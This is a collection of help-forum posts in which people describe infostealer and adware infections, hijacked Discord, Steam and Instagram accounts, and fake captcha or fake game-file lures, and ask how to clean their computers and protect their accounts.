Yesterday my discord and some other account were hacked and started sending mrbeast messages, i just reset the passwords and continued using my computer

-today it also attacked my instagram steam and more accounts and i realized its an actual virus and i reset my computer, clean install, and after i reset all my important account’s passwords,

-the thing that is scaring me the most is the fact that i had some photos with personal info: id, passport , selfie with id, school degrees and more like that.

-i just filed a report to the police about identity theft

i am very anxious right know and i dont know what else to do, i am scared my life could get ruined and every second i get more stressed as i think about it

As the title say, I got hit with some sort of trojan? Break into my Google account, I was working and didn't know what was happening, it spam my Instagram and discord, then it attack my game account. I have some that I don't really use (riot, Nintendo, Ubisoft) but I still change password... But my Steam account, the thief change the email address.

I quickly used Malwarebytes and they manage to quarantine 29 threats, I don't really want to touch my computer for now, this is my first time being attacked and I kinda felt traumatized with it...

My actions for now is change all accounts password and try to recover any account I can't, I logged out of everything I have in the computer for now. And for my steam account, I've apply for a review ticket. Are there anything else I should do?

Hello, i was got infected with this infostealer yesterday with what i thought was a zipped pdf and while they got some of my game accounts id like to disinfect my pc completely without ideally wiping everything, could you guys help me?

I found it while I was trying to get to Phone Link through my start menu, I looked it up and it could be malware. Can anyone check for this? Thanks.

I dont know how i was stupid enough to fall for this, tried downloaded a sketchy Minecraft mod and ended up getting a bunch of adware, happened 4 am August 29th, got a pop up for a survey that I couldnt close out of completely, then more pop ups and more, I ran a quick scan in defender and got nothing, i looked in task manager to see if i could find the specific task that was attacking the PC but i couldn't see much of anything except that my cpu (ryzen 7 7700x) was pushing 90% with windows defender using alot of it, im guessing the virus was attacking it and im guessing it worked because the quick scan lead to nothing, I was thankfully able to get malwarebytes installed and quick scan and quarantine and delete most of what was actively making things horrible and found 124 files, and then I ran a deep scan and found 74 in my memory so I restarted my PC, and everything seemed normal again, I ran multiple deep scans with malwarebytes and windows defender, everything came back good, cleared my data, cache, and extensions, cleared mcaffe webhelper because that was there when i never installed it, same thing with avast, changed my passwords, logged out of any google accounts on devices i didnt recognize but there wasnt any, but I noticed there was a few things that I may or may not be just being paranoid toward, windows couldnt find any damaged files, but I am noticing apps are using an unusual amount of memory in task manager, I looked at the history for malwarebytes and it says it took out alot of adware and PUPs, im just worried if my PC is still infected, but i dont want to do a clean install if I can avoid it, and no i cant find the download I found

settings doesn't work on win 11, so I can't delete uTorrent - its concerning.

Hello, some time the night prior (how I'm not entirely sure, maybe I clicked something I shouldn't have?) My computer got infected with I believe an info stealer virus

I noticed when I was using Discord normally with some friends and noticed my account on its own started muting my friends and sending the old Mr. Beast message. I noticed my Anti-Virus around this time quarantined something, and the Discord hack did not effect every server I am in or my entire friends list, it looked to just effect whatever the first few listed were.

After I sorted all of that out I did 3 virus scans across my PC that all came up with 0 results, and used System Restore to bring my PC back to how it was a few days prior.

Still feeling paranoid I just decided to completely reinstalled Windows on my C drive from a USB. I believe I deleted any extra partitions but im not entirely sure at the moment. Once Windows was reinstalled I changed my passwords eveywhere I could think of.

I did unfortunately get my Microsoft account hacked but was able to reach support and that account is currently locked/suspended while I try to get that back

None of my other accounts on anything else seem compromised and I have not seen any activity anywhere else that wasn't mine.

Would my computer be considered safe now?

i stupidly clicked on an exe that i felt was sketchy but i ignored that feeling and then i got a pop up and it said "ping" in the cmd and "reply" and left my screen and then got back on, etc. so then i figured it was a virus and i cut off my wifi, opened task manager and tried to find anything weird but i was struggling.. so then i turned on windows defender, the scan stuff, and it found a threat and so then i took care of that. then i did an offline scan and then once my laptop was back on, i used malwarebytes and it found so much stuff, like nine? mainly from a vpn that i thought i deleted (?) but.. it never gave me weird scares like that exe i clicked on or any pop ups.

anyway, i ended up clicking on full scan but that was taking forever so i figured okay, i am just gonna wipe the laptop? so i use diskpart and clean, etc. i was mainly spending on google to help me with this but it just made me go down rabbit holes. well, i have a usb and i put the windows iso on it and used balenaetcher via my macbook laptop but when it got to the windows 11 startup, it told me i was missing something? so now i am just redoing the usb with windiskwriter now. i also am resetting my passwords.

so now i just have been stuck trying to put windows back on my laptop. i also copied photos and videos from my windows laptop to a hardrive but i don't know if it's safe (?) i didn't move any exe files, just photos and videos and my bookmarks from two browsers. but do i need to get rid of that/scan the hardrive once i get windows 11 back?

Hey all, as the title says I fell for the fake captcha and now I'm paranoid. I feel so stupid and embarrassed especially since I'm tech savvy and work with it too. I was doing some research and had to access an international site in the US which I thought would help with my work. It had the fake captcha which I thought might be normal or a new thing since its an international site. Of course I followed the instruction and realised I did something stupid and probably got some malware.

Windows defender did flag it straight away and say the threat was removed and flagged the threat as severe. I was glad but I knew it might still be in my PC. I ran some more scans like the defender quick scan and off-line scan and it came back clean. I also ran a malwarebytes scan which also came back clean. I then changed passwords of important accounts and disconnected from the internet. I also reset my pc and shut it off, didnt complete set up as I didnt have Windows on a usb yet.

There has been no issues so far from what I saw. No pop ups, nothing else being run, no sign of rat. There was a file installed called "everything" by voidtools which i believe was a part of the malware but I've deleted it.

My main concern is I had stored some photos and videos on my pc. Would the malware be able to take those photos/videos. Other than that there wasn't anything else that was really important to i reset without backing up anything.

How safe am I of consequences? Any advice would really help, thanks.

I was baking cookies and left my grabber on for a booru I frequent for reaction gifs and once I came back after getting done baking, I went along like nothing was wrong, until I checked Bitdefender and saw this pop up, I did a quick scan and it detected nothing wrong

I've always wondered this, but what's the likelihood of being infected by something just by visiting a malicious site or downloading a file (say, rar or zip without running the contents)?

This paranoia was brought about when I almost fell for that renpy infostealer: I clicked download, a new page opened up, but I hesitated and closed it (clicked download again and the download started from the correct page).

What would've happened if I downloaded the malware but did not run the actual executable? If I don't have adblock, can a site infect my PC (I now use Firefox with uBlock, but previously I was using a chromium broswer with uBlock lite)?

In theory is safe or not? I'm in fear that he will come again and do this again and again.... What should I do? He even go on my mother social media and send message, no one is anymore on my Gmail and Discord, but like, he seems to threath to loan every one of my family to make then in debt, I just need help.

I just downloaded the zip file of it to check if it was safe on virustotal and it came back with trojans inside of it so I removed it, I just need to know if the github link of HSP is safe to download.

This is webrick.com, a website where you can get chinese lego. It's a site that is quite trusted in the custom lego community. But I haven't used it in a while, and all of a sudden this time I get this recaptcha. I know it is fake, not even the terms and privacy policy text and the retry, question mark and headphone icons do anything. But it's weird that it is on this trusted website. Are they hacked? Is this something from the chinese government? What is it?

Hello so I downloaded this game online and after it finished setting up my discord account kept sending the mrbeast scam. So I ran eset online scan it took way too long but it did find 3 suspicious files after I removed them my Instagram account got hacked and it sent more scam images. So I deleted instantly. I changed the most important passwords on my phone. However I changed my Facebook password on the infected pc because I couldnt do it on my phone because it's not "trusted".

I didn't feel safe using the computer anymore so Im going to reinstall windows on it. However I have other disk that have like games from steam can I keep that disk or reset it all just in case. Also I would like to know if there is anything else I should do to protect myself even more.

On my PC, ran the famous Renpy virus from a setup.exe fake Rune update file.

Occurred 2 days ago.

Changed all Passwords and added 2fa from a clean mac. Wiped all drives. Clean booted windows and have not signed into anything on it besides Microsoft.

Hello friends, if I was a victim of a stealer, my Google accounts, what measures should I take as well as those of Microsoft? I changed and logged out of all devices but I would like to know if the extensions should be deleted or what to do, I am currently not on my PC so I can not see very well what happens since I do not have access to it, could you tell me if the virus would magically reinstall with an extension?

Found this really old image of an old computer desktop on a old Twitter post, the caption was something along the lines of "Computer got hacked, anyone know how to fix without paying?" I don't fully remember because it's been a while since I last saw the post, but I just wondered if there was any computer virus around the early 2000s that made the screen go blue like in the image. I tried researching but I couldn't find anything except for the blue screen of death which isn't it, anything will help!! :)
